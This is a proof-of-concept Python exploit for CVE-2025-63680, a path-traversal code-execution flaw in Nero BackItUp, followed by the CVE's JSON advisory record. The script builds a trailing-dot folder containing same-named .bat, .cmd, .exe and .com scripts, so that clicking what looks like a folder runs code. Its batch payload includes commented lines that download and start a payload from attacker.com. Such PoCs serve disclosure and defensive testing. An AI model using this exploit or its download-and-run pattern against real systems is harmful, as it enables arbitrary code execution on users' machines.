CVE-2025-63680

# PoC for CVE-2025-63680 - Nero BackItUp Path Traversal RCE # Author: Security Researcher # Target: Nero BackItUp 2019-2025 import os import shutil def create_exploit_folder(base_name="Backup"): """ Create trailing-dot folder with malicious script inside. This exploits ShellExecuteW PATHEXT fallback behavior. """ # Create folder with trailing dot (becomes file in Windows) folder_path = os.path.join(os.getcwd(), f"{base_name}.") # Remove if exists if os.path.exists(folder_path): if os.path.isfile(folder_path): os.remove(folder_path) else: shutil.rmtree(folder_path) # Create as directory first os.makedirs(folder_path, exist_ok=True) # Create malicious script with same base name script_content = '''@echo off rem CVE-2025-63680 PoC - Arbitrary Code Execution rem This script executes when user clicks the fake folder rem Replace with actual malicious payload echo [+] CVE-2025-63680 Exploit Triggered > poc_triggered.txt whoami >> poc_triggered.txt date /t >> poc_triggered.txt time /t >> poc_triggered.txt rem Example: Download and execute payload rem curl -o payload.exe http://attacker.com/payload.exe rem start payload.exe ''' # Try multiple extensions for PATHEXT fallback for ext in ['.bat', '.cmd', '.exe', '.com']: script_path = os.path.join(folder_path, f"{base_name}{ext}") try: with open(script_path, 'w') as f: f.write(script_content) print(f"[+] Created: {script_path}") except Exception as e: print(f"[-] Failed to create {script_path}: {e}") print(f"\n[+] Exploit folder created: {folder_path}") print("[+] When Nero BackItUp displays this as folder and user clicks it,") print("[+] ShellExecuteW will execute the script via PATHEXT fallback") if __name__ == "__main__": create_exploit_folder()

{"cve": {"id": "CVE-2025-63680", "sourceIdentifier": "[email protected]", "published": "2025-11-14T19:16:01.360", "lastModified": "2026-01-12T14:56:54.810", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nero BackItUp in the Nero Productline is vulnerable to a path parsing/UI rendering flaw (CWE-22) that, in combination with Windows ShellExecuteW fallback extension resolution, leads to arbitrary code execution when a user clicks a crafted entry. By creating a trailing-dot folder and placing a same-basename script, Nero BackItUp renders the file as a folder icon and then invokes ShellExecuteW, which executes the script via PATHEXT fallback (.COM/.EXE/.BAT/.CMD). The issue affects recent Nero BackItUp product lines (2019-2025 and earlier) and has been acknowledged by the vendor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nero:backitup:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025", "matchCriteriaId": "C0417A0B-91DC-49AE-B1D5-0280F523AC70"}]}]}], "references": [{"url": "https://github.com/PotatoHamm/Nero-Productline-Vulnerability", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}